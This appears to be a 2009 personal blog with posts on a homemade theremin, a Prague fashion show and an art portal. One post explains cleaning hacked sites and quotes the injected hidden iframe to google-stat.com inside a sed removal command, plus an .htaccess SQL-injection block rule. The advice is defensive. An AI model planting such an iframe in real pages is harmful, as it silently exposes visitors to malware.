Ever since I wanted to make some music, I wanted to find something I can play on with the expression of my body. Seams I found The Instrument. Theremin. Even though you know how it looks like and you look at the picture you probably won’t recognize It. It’s the huuuge thing infront. It’s home made thing, done by who else in this part of the earth then Milan Gustar :). It sounds bit silly but for me it’s more then I actually need. I need to practise and practise and practise and… since then check this awsome girl…I mean listen to what she is doing ;) link.
“if you feed people
they become dependent and week
If you give them knowledge
those who will survive become strong.”
Are you in Prague and don’t know what to do, where to spend some cash and bring home something unique?
Then come to see the fashion show of the Private Cult clothes brand….I know something more then others :) so here is the secret. It’ll be minimalistic, with the noise sound in the background. The time will stretch that your clock will tick in slower rate as if you have crossed the black hole event horizon and all around you will move as like the matrix bullets.
If you miss the horizon, don’t wary you still can buy T-shrits, hoodies etc. until 9th.
where and when: Průmyslovy palác, Holešovice Prague, 7. – 9. May 2009
Weebit.info is a portal for a self presentation particularly artist presentation. Because the project runs only less then month, no-one understands what for it really is and how to use it. If you are one of them and want to know more, then come to see it in action on 8th April to Academy of Fine Art in Prague.
I’ll be there presenting it, and more importantly will show how to create your own presentation, answer your questions and hopefully get new ideas from your side.
Seams like we are experiencing “new” age of hacking in a mass scale recently. The target is the server side apps. First when I found injection on websites I’m currently working on I thought it’s a WP hole, but supposedly all happened during the unencrypted ftp connections, I dare to say, I made from Windows system. What have I read is that there is a worm or horse or whatever animal who catches the user & password data, it either downloads each index (text file) from server or inject it’s code directly in server during or else after the ftp session.
Solution seams to be so far.
Do not use Windows :), no seriously, run the Antivir in windows safe mode, then change the ftp password, clean up the infected files and never use simple ftp again. Use SFTP only!
If you found “little iframe”, run the first command on the server (you have to have SSH access, if you don’t ask for it, and if they don’t give it to you I suggest change hosting, or ask them if they can do it for you (they have to give you sftp access anyway). Run the command bellow. It founds infected files.
find . | xargs grep "google-stat"
Then if it founds the injection then, clean it up.
find ./* -type f -exec sed -i 's/<iframe src="http:\/\/google-stat.com\/tomi\/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;
here is another help(.httacess)
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]
if you are on Dreamhost and even if you are not look here
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites
references: